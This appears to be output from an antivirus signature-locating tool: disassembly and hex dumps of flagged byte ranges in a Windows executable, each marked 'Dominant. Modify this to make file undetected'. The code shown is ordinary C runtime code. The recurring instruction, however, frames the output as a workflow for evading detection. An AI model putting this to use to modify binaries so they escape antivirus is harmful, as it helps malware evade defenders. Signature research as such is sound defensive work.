0x1e94: 0x00402a94 68d02b4100 push str.FlsAlloc ; 0x412bd0 ; "FlsAlloc" ; PFLS_CALLBACK_FUNCTION lpCallback
0x1e99: 0x00402a99 6a00 push 0 ; int32_t arg_8h
0x1e9b: 0x00402a9b e89dffffff call fcn.00402a3d
0x1ea0: 0x00402aa0 8bf0 mov esi, eax
0x1ea2: 0x00402aa2 83c410 add esp, 0x10
0x1ea5: 0x00402aa5 85f6 test esi, esi
0x1ea7: < 0x00402aa7 7410 je 0x402ab9
0x1ea9: 0x00402aa9 ff7508 push dword [arg_8h]
0x1eac: 0x00402aac 8bce mov ecx, esi
0x1eae: 0x00402aae ff1520214100 call dword [0x412120]
0x1eb4: 0x00402ab4 ffd6 call esi
0x1eb6: 0x00402ab6 5e pop esi
0x1eb7: 0x00402ab7 5d pop ebp
0x1eb8: 0x00402ab8 c3 ret
0x1eb9: ; CODE XREF from fcn.00402a86 @ 0x402aa7(x)
0x1eb9: > 0x00402ab9 5e pop esi
0x1eba: 0x00402aba 5d pop ebp
0x1ebb: 0x00402abb ff2560204100 jmp dword [sym.imp.KERNEL32.dll_TlsAlloc] ; 0x412060
0x1ec1: ; CALL XREF from fcn.004028f6 @ 0x402901(x)
0x1ec1: 59: fcn.00402ac1 (int32_t arg_8h);
0x1ec1: ; arg int32_t arg_8h @ ebp+0x8
0x1ec1: 0x00402ac1 55 push ebp
0x1ec2: 0x00402ac2 8bec mov ebp, esp
0x1ec4: 0x00402ac4 56 push esi
0x1ec5: 0x00402ac5 68e42b4100 push str.FlsFree ; 0x412be4 ; "FlsFree" ; DWORD dwFlsIndex
0x1eca: 0x00402aca 68dc2b4100 push 0x412bdc
0x1ecf: 0x00402acf 68e42b4100 push str.FlsFree ; 0x412be4 ; "FlsFree" ; LPCSTR lpProcName
0x1ed4: 0x00402ad4 6a01 push 1 ; 1 ; int32_t arg_8h
0x1ed6: 0x00402ad6 e862ffffff call fcn.00402a3d
0x1edb: 0x00402adb 83c410 add esp, 0x10
0x1ede: 0x00402ade 8bf0 mov esi, eax
0x1ee0: 0x00402ae0 ff7508 push dword [arg_8h]
0x1ee3: 0x00402ae3 85 invalid

Match 26: 7960 (size: 306)

Dominant. Modify this to make file undetected

.text

00001F18   10 8B F0 FF 75 08 85 F6 74 0C 8B CE FF 15 20 21    ....u...t..... !
00001F28   41 00 FF D6 EB 06 FF 15 64 20 41 00 5E 5D C3 55    A.......d A.^].U
00001F38   8B EC 56 68 08 2C 41 00 68 00 2C 41 00 68 08 2C    ..Vh.,A.h.,A.h.,
00001F48   41 00 6A 03 E8 EC FE FF FF 83 C4 10 8B F0 FF 75    A.j............u
00001F58   0C FF 75 08 85 F6 74 0C 8B CE FF 15 20 21 41 00    ..u...t..... !A.
00001F68   FF D6 EB 06 FF 15 68 20 41 00 5E 5D C3 55 8B EC    ......h A.^].U..
00001F78   56 68 1C 2C 41 00 68 14 2C 41 00 68 1C 2C 41 00    Vh.,A.h.,A.h.,A.
00001F88   6A 04 E8 AE FE FF FF 8B F0 83 C4 10 85 F6 74 15    j.............t.
00001F98   FF 75 10 8B CE FF 75 0C FF 75 08 FF 15 20 21 41    .u....u..u... !A
00001FA8   00 FF D6 EB 0C FF 75 0C FF 75 08 FF 15 5C 20 41    ......u..u...\ A
00001FB8   00 5E 5D C3 CC CC CC CC 57 56 8B 74 24 10 8B 4C    .^].....WV.t$..L
00001FC8   24 14 8B 7C 24 0C 8B C1 8B D1 03 C6 3B FE 76 08    $..|$.......;.v.
00001FD8   3B F8 0F 82 94 02 00 00 83 F9 20 0F 82 D2 04 00    ;......... .....
00001FE8   00 81 F9 80 00 00 00 73 13 0F BA 25 10 A0 41 00    .......s...%..A.
00001FF8   01 0F 82 8E 04 00 00 E9 E3 01 00 00 0F BA 25 1C    ..............%.
00002008   AC 41 00 01 73 09 F3 A4 8B 44 24 0C 5E 5F C3 8B    .A..s....D$.^_..
00002018   C7 33 C6 A9 0F 00 00 00 75 0E 0F BA 25 10 A0 41    .3......u...%..A
00002028   00 01 0F 82 E0 03 00 00 0F BA 25 1C AC 41 00 00    ..........%..A..
00002038   0F 83 A9 01 00 00 F7 C7 03 00 00 00 0F 85 9D 01    ................
00002048   00 00                                              ..

0x1f0a: 0x00402b0a 68f42b4100 push str.FlsGetValue ; 0x412bf4 ; "FlsGetValue" ; LPCSTR lpProcName
0x1f0f: 0x00402b0f 6a02 push 2 ; 2 ; int32_t arg_8h
0x1f11: 0x00402b11 e827ffffff call fcn.00402a3d
0x1f16: 0x00402b16 83c410 add esp, 0x10
0x1f19: 0x00402b19 8bf0 mov esi, eax
0x1f1b: 0x00402b1b ff7508 push dword [arg_8h]
0x1f1e: 0x00402b1e 85f6 test esi, esi
0x1f20: < 0x00402b20 740c je 0x402b2e
0x1f22: 0x00402b22 8bce mov ecx, esi
0x1f24: 0x00402b24 ff1520214100 call dword [0x412120]
0x1f2a: 0x00402b2a ffd6 call esi
0x1f2c: < 0x00402b2c eb06 jmp 0x402b34
0x1f2e: ; CODE XREF from fcn.00402afc @ 0x402b20(x)
0x1f2e: > 0x00402b2e ff1564204100 call dword [sym.imp.KERNEL32.dll_TlsGetValue] ; 0x412064 ; LPVOID TlsGetValue(DWORD dwTlsIndex)
0x1f34: ; CODE XREF from fcn.00402afc @ 0x402b2c(x)
0x1f34: > 0x00402b34 5e pop esi
0x1f35: 0x00402b35 5d pop ebp
0x1f36: 0x00402b36 c3 ret
0x1f37: ; CALL XREFS from fcn.00402831 @ 0x402866(x), 0x40288e(x), 0x4028a2(x)
0x1f37: ; CALL XREF from fcn.004028c3 @ 0x4028e1(x)
0x1f37: 62: fcn.00402b37 (int32_t arg_8h, int32_t arg_ch);
0x1f37: ; arg int32_t arg_8h @ ebp+0x8
0x1f37: ; arg int32_t arg_ch @ ebp+0xc
0x1f37: 0x00402b37 55 push ebp
0x1f38: 0x00402b38 8bec mov ebp, esp
0x1f3a: 0x00402b3a 56 push esi ; PVOID lpFlsData
0x1f3b: 0x00402b3b 68082c4100 push str.FlsSetValue ; 0x412c08 ; "FlsSetValue" ; DWORD dwFlsIndex
0x1f40: 0x00402b40 68002c4100 push 0x412c00 ; PVOID lpFlsData
0x1f45: 0x00402b45 68082c4100 push str.FlsSetValue ; 0x412c08 ; "FlsSetValue" ; LPCSTR lpProcName
0x1f4a: 0x00402b4a 6a03 push 3 ; 3 ; int32_t arg_8h
0x1f4c: 0x00402b4c e8ecfeffff call fcn.00402a3d
0x1f51: 0x00402b51 83c410 add esp, 0x10
0x1f54: 0x00402b54 8bf0 mov esi, eax
0x1f56: 0x00402b56 ff750c push dword [arg_ch]
0x1f59: 0x00402b59 ff7508 push dword [arg_8h]
0x1f5c: 0x00402b5c 85f6 test esi, esi
0x1f5e: < 0x00402b5e 740c je 0x402b6c
0x1f60: 0x00402b60 8bce mov ecx, esi
0x1f62: 0x00402b62 ff1520214100 call dword [0x412120]
0x1f68: 0x00402b68 ffd6 call esi
0x1f6a: < 0x00402b6a eb06 jmp 0x402b72
0x1f6c: ; CODE XREF from fcn.00402b37 @ 0x402b5e(x)
0x1f6c: > 0x00402b6c ff1568204100 call dword [sym.imp.KERNEL32.dll_TlsSetValue] ; 0x412068 ; BOOL TlsSetValue(DWORD dwTlsIndex, LPVOID lpTlsValue)
0x1f72: ; CODE XREF from fcn.00402b37 @ 0x402b6a(x)
0x1f72: > 0x00402b72 5e pop esi
0x1f73: 0x00402b73 5d pop ebp
0x1f74: 0x00402b74 c3 ret
0x1f75: ; CALL XREF from fcn.00402911 @ 0x402922(x)
0x1f75: 71: fcn.00402b75 (LPCRITICAL_SECTION lpCriticalSection, DWORD dwSpinCount, int32_t arg_10h);
0x1f75: ; arg LPCRITICAL_SECTION lpCriticalSection @ ebp+0x8
0x1f75: ; arg DWORD dwSpinCount @ ebp+0xc
0x1f75: ; arg int32_t arg_10h @ ebp+0x10
0x1f75: 0x00402b75 55 push ebp ; DWORD Flags
0x1f76: 0x00402b76 8bec mov ebp, esp
0x1f78: 0x00402b78 56 push esi ; DWORD dwSpinCount
0x1f79: 0x00402b79 681c2c4100 push str.InitializeCriticalSectionEx ; 0x412c1c ; "InitializeCriticalSectionEx" ; DWORD Flags
0x1f7e: 0x00402b7e 68142c4100 push 0x412c14 ; '\x14,A' ; DWORD dwSpinCount
0x1f83: 0x00402b83 681c2c4100 push str.InitializeCriticalSectionEx ; 0x412c1c ; "InitializeCriticalSectionEx" ; LPCRITICAL_SECTION lpCriticalSection
0x1f88: 0x00402b88 6a04 push 4 ; 4
0x1f8a: 0x00402b8a e8aefeffff call fcn.00402a3d
0x1f8f: 0x00402b8f 8bf0 mov esi, eax
0x1f91: 0x00402b91 83c410 add esp, 0x10
0x1f94: 0x00402b94 85f6 test esi, esi
0x1f96: < 0x00402b96 7415 je 0x402bad
0x1f98: 0x00402b98 ff7510 push dword [arg_10h]
0x1f9b: 0x00402b9b 8bce mov ecx, esi
0x1f9d: 0x00402b9d ff750c push dword [dwSpinCount]
0x1fa0: 0x00402ba0 ff7508 push dword [lpCriticalSection]
0x1fa3: 0x00402ba3 ff1520214100 call dword [0x412120]
0x1fa9: 0x00402ba9 ffd6 call esi
0x1fab: < 0x00402bab eb0c jmp 0x402bb9
0x1fad: ; CODE XREF from fcn.00402b75 @ 0x402b96(x)
0x1fad: > 0x00402bad ff750c push dword [dwSpinCount] ; DWORD dwSpinCount
0x1fb0: 0x00402bb0 ff7508 push dword [lpCriticalSection] ; LPCRITICAL_SECTION lpCriticalSection
0x1fb3: 0x00402bb3 ff155c204100 call dword [sym.imp.KERNEL32.dll_InitializeCriticalSectionAndSpinCount] ; 0x41205c ; "|\x96\x01" ; BOOL InitializeCriticalSectionAndSpinCount(LPCRITICAL_SECTION lpCriticalSection, DWORD dwSpinCount)
0x1fb9: ; CODE XREF from fcn.00402b75 @ 0x402bab(x)
0x1fb9: > 0x00402bb9 5e pop esi
0x1fba: 0x00402bba 5d pop ebp
0x1fbb: 0x00402bbb c3 ret
0x1fbc: 0x00402bbc cc int3
0x1fbd: 0x00402bbd cc int3
0x1fbe: 0x00402bbe cc int3
0x1fbf: 0x00402bbf cc int3
0x1fc0: ; XREFS: CALL 0x00404dc8 CALL 0x00408710 CALL 0x00408a4c
0x1fc0: ; XREFS: CALL 0x00409d1d CALL 0x00409f00 CALL 0x0040bbcd
0x1fc0: ; XREFS: CALL 0x0040c8b0 CALL 0x0040d5d3 CALL 0x0040dab2
0x1fc0: 1330: fcn.00402bc0 (int32_t arg_ch, int32_t arg_10h, int32_t arg_14h, int32_t arg_ch_2, int32_t arg_ch_3, int32_t arg_ch_4);
0x1fc0: ; arg int32_t arg_ch @ esp+0x10
0x1fc0: ; arg int32_t arg_10h @ esp+0x14
0x1fc0: ; arg int32_t arg_14h @ esp+0x18
0x1fc0: ; arg int32_t arg_ch_2 @ esp+0x1c
0x1fc0: ; arg int32_t arg_ch_3 @ esp+0x28
0x1fc0: ; arg int32_t arg_ch_4 @ esp+0x34
0x1fc0: 0x00402bc0 57 push edi
0x1fc1: 0x00402bc1 56 push esi
0x1fc2: 0x00402bc2 8b742410 mov esi, dword [arg_10h]
0x1fc6: 0x00402bc6 8b4c2414 mov ecx, dword [arg_14h]
0x1fca: 0x00402bca 8b7c240c mov edi, dword [arg_ch]
0x1fce: 0x00402bce 8bc1 mov eax, ecx
0x1fd0: 0x00402bd0 8bd1 mov edx, ecx
0x1fd2: 0x00402bd2 03c6 add eax, esi
0x1fd4: 0x00402bd4 3bfe cmp edi, esi
0x1fd6: < 0x00402bd6 7608 jbe 0x402be0
0x1fd8: 0x00402bd8 3bf8 cmp edi, eax
0x1fda: < 0x00402bda 0f8294020000 jb 0x402e74
0x1fe0: ; CODE XREF from fcn.00402bc0 @ 0x402bd6(x)
0x1fe0: > 0x00402be0 83f920 cmp ecx, 0x20 ; 32
0x1fe3: < 0x00402be3 0f82d2040000 jb case.default.0x402e15
0x1fe9: 0x00402be9 81f980000000 cmp ecx, 0x80 ; 128
0x1fef: < 0x00402bef 7313 jae 0x402c04
0x1ff1: 0x00402bf1 0fba2510a041. bt dword [0x41a010], 1
0x1ff9: < 0x00402bf9 0f828e040000 jb 0x40308d
0x1fff: < 0x00402bff e9e3010000 jmp 0x402de7
0x2004: ; CODE XREF from fcn.00402bc0 @ 0x402bef(x)
0x2004: > 0x00402c04 0fba251cac41. bt dword [0x41ac1c], 1
0x200c: < 0x00402c0c 7309 jae 0x402c17
0x200e: 0x00402c0e f3a4 rep movsb byte es:[edi], byte [esi]
0x2010: 0x00402c10 8b44240c mov eax, dword [arg_ch]
0x2014: 0x00402c14 5e pop esi
0x2015: 0x00402c15 5f pop edi
0x2016: 0x00402c16 c3 ret
0x2017: ; CODE XREF from fcn.00402bc0 @ 0x402c0c(x)
0x2017: > 0x00402c17 8bc7 mov eax, edi
0x2019: 0x00402c19 33c6 xor eax, esi
0x201b: 0x00402c1b a90f000000 test eax, 0xf ; 15
0x2020: < 0x00402c20 750e jne 0x402c30
0x2022: 0x00402c22 0fba2510a041. bt dword [0x41a010], 1
0x202a: < 0x00402c2a 0f82e0030000 jb 0x403010
0x2030: ; CODE XREF from fcn.00402bc0 @ 0x402c20(x)
0x2030: > 0x00402c30 0fba251cac41. bt dword [0x41ac1c], 0
0x2038: < 0x00402c38 0f83a9010000 jae 0x402de7
0x203e: 0x00402c3e f7c703000000 test edi, 3 ; 3
0x2044: < 0x00402c44 0f859d010000 jne 0x402de7
0x204a: 0x00402c4a f7c603000000 test esi, 3 ; 3
0x2050: < 0x00402c50 0f85ac010000 jne 0x402e02
0x2056: 0x00402c56 0fbae702 bt edi, 2

Match 27: 8674 (size: 102)

Dominant. Modify this to make file undetected

.text

000021E2   2E 40 00 FF E0 F7 C7 03 00 00 00 74 13 8A 06 88    .@.........t....
000021F2   07 49 83 C6 01 83 C7 01 F7 C7 03 00 00 00 75 ED    .I............u.
00002202   8B D1 83 F9 20 0F 82 AE 02 00 00 C1 E9 02 F3 A5    .... ...........
00002212   83 E2 03 FF 24 95 24 2E 40 00 FF 24 8D 34 2E 40    ....$.$.@..$.4.@
00002222   00 90 34 2E 40 00 3C 2E 40 00 48 2E 40 00 5C 2E    ..4.@.<.@.H.@.\.
00002232   40 00 8B 44 24 0C 5E 5F C3 90 8A 06 88 07 8B 44    @..D$.^_.......D
00002242   24 0C 5E 5F C3 90                                  $.^_..

0x21d4: 0x00402dd4 8d7608 lea esi, [esi + 8]
0x21d7: 0x00402dd7 660fd60f movq qword [edi], xmm1
0x21db: 0x00402ddb 8d7f08 lea edi, [edi + 8]
0x21de: ;-- default: ; from 0x402de5
0x21de: ; CODE XREFS from fcn.00402bc0 @ 0x402dcb(x), 0x402de5(x)
0x21de: > 0x00402dde 8b048d242e40. mov eax, dword [ecx*4 + 0x402e24]
0x21e5: ;-- switch
0x21e5: 0x00402de5 ffe0 jmp eax ; switch table (4 cases) at 0x402e24
0x21e7: ; CODE XREFS from fcn.00402bc0 @ 0x402bff(x), 0x402c38(x), 0x402c44(x)
0x21e7: 0x00402de7 f7c703000000 test edi, 3 ; 3
0x21ed: < 0x00402ded 7413 je 0x402e02
0x21ef: ; CODE XREF from fcn.00402bc0 @ 0x402e00(x)
0x21ef: > 0x00402def 8a06 mov al, byte [esi]
0x21f1: 0x00402df1 8807 mov byte [edi], al
0x21f3: 0x00402df3 49 dec ecx
0x21f4: 0x00402df4 83c601 add esi, 1
0x21f7: 0x00402df7 83c701 add edi, 1
0x21fa: 0x00402dfa f7c703000000 test edi, 3 ; 3
0x2200: < 0x00402e00 75ed jne 0x402def
0x2202: ; CODE XREFS from fcn.00402bc0 @ 0x402c50(x), 0x402ded(x)
0x2202: > 0x00402e02 8bd1 mov edx, ecx
0x2204: 0x00402e04 83f920 cmp ecx, 0x20 ; 32
0x2207: < 0x00402e07 0f82ae020000 jb case.default.0x402e15
0x220d: 0x00402e0d c1e902 shr ecx, 2
0x2210: 0x00402e10 f3a5 rep movsd dword es:[edi], dword [esi]
0x2212: 0x00402e12 83e203 and edx, 3
0x2215: ;-- switch
0x2215: 0x00402e15 ff2495242e40. jmp dword [edx*4 + 0x402e24] ; "4.@" ; switch table (4 cases) at 0x402e24
0x221c: 0x00402e1c ff248d342e40. jmp dword [ecx*4 + case.switch.0x00402e15] ; case.0x402de5.0
0x221c: ; 0x402e34
0x2223: 0x00402e23 90 nop
0x2224: ; CODE XREFS from fcn.00402bc0 @ 0x402dde(r), 0x402e15(x)
0x2224: 0x00402e24 .int32 4206132 ; case.0x402e15.0 ; case.0x402de5.0
0x2228: 0x00402e28 .int32 4206140 ; case.0x402e15.1 ; case.0x402de5.1
0x222c: 0x00402e2c .int32 4206152 ; case.0x402e15.2 ; case.0x402de5.2
0x2230: 0x00402e30 .int32 4206172 ; case.0x402e15.3 ; case.0x402de5.3
0x2234: ;-- case 0: ; from 0x00402de5
0x2234: ; CODE XREFS from fcn.00402bc0 @ 0x402de5(x), 0x402e15(x)
0x2234: ; CODE XREF from switch.0x00402e15 @ +0x7(x)
0x2234: 0x00402e34 8b44240c mov eax, dword [arg_ch]
0x2238: 0x00402e38 5e pop esi
0x2239: 0x00402e39 5f pop edi
0x223a: 0x00402e3a c3 ret
0x223b: 0x00402e3b 90 nop
0x223c: ;-- case 1: ; from 0x00402de5
0x223c: ; CODE XREFS from fcn.00402bc0 @ 0x402de5(x), 0x402e15(x)
0x223c: 0x00402e3c 8a06 mov al, byte [esi]
0x223e: 0x00402e3e 8807 mov byte [edi], al
0x2240: 0x00402e40 8b44240c mov eax, dword [arg_ch_2]
0x2244: 0x00402e44 5e pop esi
0x2245: 0x00402e45 5f pop edi
0x2246: 0x00402e46 c3 ret
0x2247: 0x00402e47 90 nop
0x2248: ;-- case 2: ; from 0x00402de5
0x2248: ; CODE XREFS from fcn.00402bc0 @ 0x402de5(x), 0x402e15(x)
0x2248: 0x00402e48 8a06 mov al, byte [esi]
0x224a: 0x00402e4a 8807 mov byte [edi], al
0x224c: 0x00402e4c 8a4601 mov al, byte [esi + 1]
0x224f: 0x00402e4f 884701 mov byte [edi + 1], al
0x2252: 0x00402e52 8b44240c mov eax, dword [arg_ch_3]
0x2256: 0x00402e56 5e pop esi
0x2257: 0x00402e57 5f pop edi

Match 28: 9218 (size: 272)

Dominant. Modify this to make file undetected

.text

00002402   75 F1 8B 44 24 0C 5E 5F C3 EB 03 CC CC CC 8B C6    u..D$.^_........
00002412   83 E0 0F 85 C0 0F 85 E3 00 00 00 8B D1 83 E1 7F    ................
00002422   C1 EA 07 74 66 8D A4 24 00 00 00 00 8B FF 66 0F    ...tf..$......f.
00002432   6F 06 66 0F 6F 4E 10 66 0F 6F 56 20 66 0F 6F 5E    o.f.oN.f.oV f.o^
00002442   30 66 0F 7F 07 66 0F 7F 4F 10 66 0F 7F 57 20 66    0f...f..O.f..W f
00002452   0F 7F 5F 30 66 0F 6F 66 40 66 0F 6F 6E 50 66 0F    .._0f.of@f.onPf.
00002462   6F 76 60 66 0F 6F 7E 70 66 0F 7F 67 40 66 0F 7F    ov`f.o~pf..g@f..
00002472   6F 50 66 0F 7F 77 60 66 0F 7F 7F 70 8D B6 80 00    oPf..w`f...p....
00002482   00 00 8D BF 80 00 00 00 4A 75 A3 85 C9 74 5F 8B    ........Ju...t_.
00002492   D1 C1 EA 05 85 D2 74 21 8D 9B 00 00 00 00 F3 0F    ......t!........
000024A2   6F 06 F3 0F 6F 4E 10 F3 0F 7F 07 F3 0F 7F 4F 10    o...oN........O.
000024B2   8D 76 20 8D 7F 20 4A 75 E5 83 E1 1F 74 30 8B C1    .v .. Ju....t0..
000024C2   C1 E9 02 74 0F 8B 16 89 17 83 C7 04 83 C6 04 83    ...t............
000024D2   E9 01 75 F1 8B C8 83 E1 03 74 13 8A 06 88 07 46    ..u......t.....F
000024E2   47 49 75 F7 8D A4 24 00 00 00 00 8D 49 00 8B 44    GIu...$.....I..D
000024F2   24 0C 5E 5F C3 8D A4 24 00 00 00 00 8B FF BA 10    $.^_...$........
00002502   00 00 00 2B D0 2B CA 51 8B C2 8B C8 83 E1 03 74    ...+.+.Q.......t

0x23f3: < 0x00402ff3 740f je 0x403004
0x23f5: ; CODE XREF from fcn.00402bc0 @ 0x403002(x)
0x23f5: > 0x00402ff5 83ef01 sub edi, 1
0x23f8: 0x00402ff8 83ee01 sub esi, 1
0x23fb: 0x00402ffb 8a06 mov al, byte [esi]
0x23fd: 0x00402ffd 8807 mov byte [edi], al
0x23ff: 0x00402fff 83e901 sub ecx, 1
0x2402: < 0x00403002 75f1 jne 0x402ff5
0x2404: ; CODE XREF from fcn.00402bc0 @ 0x402ff3(x)
0x2404: > 0x00403004 8b44240c mov eax, dword [arg_ch]
0x2408: 0x00403008 5e pop esi
0x2409: 0x00403009 5f pop edi
0x240a: 0x0040300a c3 ret
0x240b: < 0x0040300b eb03 jmp 0x403010 ; fcn.00402bc0+0x450
0x240d: 0x0040300d cc int3
0x240e: 0x0040300e cc int3
0x240f: 0x0040300f cc int3
0x2410: ; CODE XREF from fcn.00402bc0 @ 0x402c2a(x)
0x2410: ; CODE XREF from case.default.0x402ec8 @ +0x37(x)
0x2410: > 0x00403010 8bc6 mov eax, esi
0x2412: 0x00403012 83e00f and eax, 0xf ; 15
0x2415: 0x00403015 85c0 test eax, eax
0x2417: < 0x00403017 0f85e3000000 jne 0x403100
0x241d: ; CODE XREF from fcn.00402bc0 @ 0x40312f(x)
0x241d: 0x0040301d 8bd1 mov edx, ecx
0x241f: 0x0040301f 83e17f and ecx, 0x7f ; 127
0x2422: 0x00403022 c1ea07 shr edx, 7
0x2425: < 0x00403025 7466 je 0x40308d
0x2427: 0x00403027 8da424000000. lea esp, [esp]
0x242e: 0x0040302e 8bff mov edi, edi
0x2430: ; CODE XREF from fcn.00402bc0 @ 0x40308b(x)
0x2430: > 0x00403030 660f6f06 movdqa xmm0, xmmword [esi]
0x2434: 0x00403034 660f6f4e10 movdqa xmm1, xmmword [esi + 0x10]
0x2439: 0x00403039 660f6f5620 movdqa xmm2, xmmword [esi + 0x20]
0x243e: 0x0040303e 660f6f5e30 movdqa xmm3, xmmword [esi + 0x30]
0x2443: 0x00403043 660f7f07 movdqa xmmword [edi], xmm0
0x2447: 0x00403047 660f7f4f10 movdqa xmmword [edi + 0x10], xmm1
0x244c: 0x0040304c 660f7f5720 movdqa xmmword [edi + 0x20], xmm2
0x2451: 0x00403051 660f7f5f30 movdqa xmmword [edi + 0x30], xmm3
0x2456: 0x00403056 660f6f6640 movdqa xmm4, xmmword [esi + 0x40]
0x245b: 0x0040305b 660f6f6e50 movdqa xmm5, xmmword [esi + 0x50]
0x2460: 0x00403060 660f6f7660 movdqa xmm6, xmmword [esi + 0x60]
0x2465: 0x00403065 660f6f7e70 movdqa xmm7, xmmword [esi + 0x70]
0x246a: 0x0040306a 660f7f6740 movdqa xmmword [edi + 0x40], xmm4
0x246f: 0x0040306f 660f7f6f50 movdqa xmmword [edi + 0x50], xmm5
0x2474: 0x00403074 660f7f7760 movdqa xmmword [edi + 0x60], xmm6
0x2479: 0x00403079 660f7f7f70 movdqa xmmword [edi + 0x70], xmm7
0x247e: 0x0040307e 8db680000000 lea esi, [esi + 0x80]
0x2484: 0x00403084 8dbf80000000 lea edi, [edi + 0x80]
0x248a: 0x0040308a 4a dec edx
0x248b: < 0x0040308b 75a3 jne 0x403030
0x248d: ; CODE XREFS from fcn.00402bc0 @ 0x402bf9(x), 0x403025(x)
0x248d: > 0x0040308d 85c9 test ecx, ecx
0x248f: < 0x0040308f 745f je 0x4030f0
0x2491: 0x00403091 8bd1 mov edx, ecx
0x2493: 0x00403093 c1ea05 shr edx, 5
0x2496: 0x00403096 85d2 test edx, edx
0x2498: < 0x00403098 7421 je case.default.0x402e15
0x249a: 0x0040309a 8d9b00000000 lea ebx, [ebx]
0x24a0: ; CODE XREF from fcn.00402bc0 @ 0x4030b9(x)
0x24a0: > 0x004030a0 f30f6f06 movdqu xmm0, xmmword [esi]
0x24a4: 0x004030a4 f30f6f4e10 movdqu xmm1, xmmword [esi + 0x10]
0x24a9: 0x004030a9 f30f7f07 movdqu xmmword [edi], xmm0
0x24ad: 0x004030ad f30f7f4f10 movdqu xmmword [edi + 0x10], xmm1
0x24b2: 0x004030b2 8d7620 lea esi, [esi + 0x20]
0x24b5: 0x004030b5 8d7f20 lea edi, [edi + 0x20]
0x24b8: 0x004030b8 4a dec edx
0x24b9: < 0x004030b9 75e5 jne 0x4030a0
0x24bb: ;-- default: ; from 0x402e15
0x24bb: ; CODE XREFS from fcn.00402bc0 @ 0x402be3(x), 0x402e07(x), 0x402e15(x), 0x403098(x)
0x24bb: > 0x004030bb 83e11f and ecx, 0x1f ; 31
0x24be: < 0x004030be 7430 je 0x4030f0
0x24c0: 0x004030c0 8bc1 mov eax, ecx
0x24c2: 0x004030c2 c1e902 shr ecx, 2
0x24c5: < 0x004030c5 740f je 0x4030d6
0x24c7: ; CODE XREF from fcn.00402bc0 @ 0x4030d4(x)
0x24c7: > 0x004030c7 8b16 mov edx, dword [esi]
0x24c9: 0x004030c9 8917 mov dword [edi], edx
0x24cb: 0x004030cb 83c704 add edi, 4
0x24ce: 0x004030ce 83c604 add esi, 4
0x24d1: 0x004030d1 83e901 sub ecx, 1
0x24d4: < 0x004030d4 75f1 jne 0x4030c7
0x24d6: ; CODE XREF from fcn.00402bc0 @ 0x4030c5(x)
0x24d6: > 0x004030d6 8bc8 mov ecx, eax
0x24d8: 0x004030d8 83e103 and ecx, 3
0x24db: < 0x004030db 7413 je 0x4030f0
0x24dd: ; CODE XREF from fcn.00402bc0 @ 0x4030e4(x)
0x24dd: > 0x004030dd 8a06 mov al, byte [esi]
0x24df: 0x004030df 8807 mov byte [edi], al
0x24e1: 0x004030e1 46 inc esi
0x24e2: 0x004030e2 47 inc edi
0x24e3: 0x004030e3 49 dec ecx
0x24e4: < 0x004030e4 75f7 jne 0x4030dd
0x24e6: 0x004030e6 8da424000000. lea esp, [esp]
0x24ed: 0x004030ed 8d4900 lea ecx, [ecx]
0x24f0: ; CODE XREFS from fcn.00402bc0 @ 0x40308f(x), 0x4030be(x), 0x4030db(x)
0x24f0: > 0x004030f0 8b44240c mov eax, dword [arg_ch]
0x24f4: 0x004030f4 5e pop esi
0x24f5: 0x004030f5 5f pop edi
0x24f6: 0x004030f6 c3 ret
0x24f7: 0x004030f7 8da424000000. lea esp, [esp]
0x24fe: 0x004030fe 8bff mov edi, edi
0x2500: ; CODE XREF from fcn.00402bc0 @ 0x403017(x)
0x2500: > 0x00403100 ba10000000 mov edx, 0x10 ; 16
0x2505: 0x00403105 2bd0 sub edx, eax
0x2507: 0x00403107 2bca sub ecx, edx
0x2509: 0x00403109 51 push ecx
0x250a: 0x0040310a 8bc2 mov eax, edx
0x250c: 0x0040310c 8bc8 mov ecx, eax
0x250e: 0x0040310e 83e103 and ecx, 3
0x2511: < 0x00403111 7409 je 0x40311c
0x2513: ; CODE XREF from fcn.00402bc0 @ 0x40311a(x)
0x2513: > 0x00403113 8a16 mov dl, byte [esi]
0x2515: 0x00403115 8817 mov byte [edi], dl
0x2517: 0x00403117 46 inc esi
0x2518: 0x00403118 47 inc edi
0x2519: 0x00403119 49 dec ecx
0x251a: < 0x0040311a 75f7 jne 0x403113
0x251c: ; CODE XREF from fcn.00402bc0 @ 0x403111(x)
0x251c: > 0x0040311c c1e802 shr eax, 2
0x251f: < 0x0040311f 740d je 0x40312e
0x2521: ; CODE XREF from fcn.00402bc0 @ 0x40312c(x)
0x2521: 0x00403121 8b invalid

Match 29: 9524 (size: 238)

Dominant. Modify this to make file undetected

.text

00002534   CC CC CC CC CC CC CC CC CC CC CC CC A1 C8 AC 41    ...............A
00002544   00 56 6A 03 5E 85 C0 75 07 B8 00 02 00 00 EB 06    .Vj.^..u........
00002554   3B C6 7D 07 8B C6 A3 C8 AC 41 00 6A 04 50 E8 57    ;.}......A.j.P.W
00002564   3A 00 00 6A 00 A3 CC AC 41 00 E8 A8 3A 00 00 83    :..j....A...:...
00002574   C4 0C 83 3D CC AC 41 00 00 75 2B 6A 04 56 89 35    ...=..A..u+j.V.5
00002584   C8 AC 41 00 E8 31 3A 00 00 6A 00 A3 CC AC 41 00    ..A..1:..j....A.
00002594   E8 82 3A 00 00 83 C4 0C 83 3D CC AC 41 00 00 75    ..:......=..A..u
000025A4   05 83 C8 FF 5E C3 57 33 FF BE 40 A0 41 00 6A 00    ....^.W3..@.A.j.
000025B4   68 A0 0F 00 00 8D 46 20 50 E8 C7 3D 00 00 A1 CC    h.....F P..=....
000025C4   AC 41 00 8B D7 C1 FA 06 89 34 B8 8B C7 83 E0 3F    .A.......4.....?
000025D4   6B C8 38 8B 04 95 20 B0 41 00 8B 44 08 18 83 F8    k.8... .A..D....
000025E4   FF 74 09 83 F8 FE 74 04 85 C0 75 07 C7 46 10 FE    .t....t...u..F..
000025F4   FF FF FF 83 C6 38 47 81 FE E8 A0 41 00 75 AF 5F    .....8G....A.u._
00002604   33 C0 5E C3 8B FF 55 8B EC 6B 45 08 38 05 40 A0    3.^...U..kE.8.@.
00002614   41 00 5D C3 8B FF 56 E8 D8 41 00 00 E8 9E          A.]...V..A....

0x2525: 0x00403125 8d7604 lea esi, [esi + 4]
0x2528: 0x00403128 8d7f04 lea edi, [edi + 4]
0x252b: 0x0040312b 48 dec eax
0x252c: < 0x0040312c 75f3 jne 0x403121
0x252e: ; CODE XREF from fcn.00402bc0 @ 0x40311f(x)
0x252e: > 0x0040312e 59 pop ecx
0x252f: < 0x0040312f e9e9feffff jmp 0x40301d
0x2534: 0x00403134 cc int3
0x2535: 0x00403135 cc int3
0x2536: 0x00403136 cc int3
0x2537: 0x00403137 cc int3
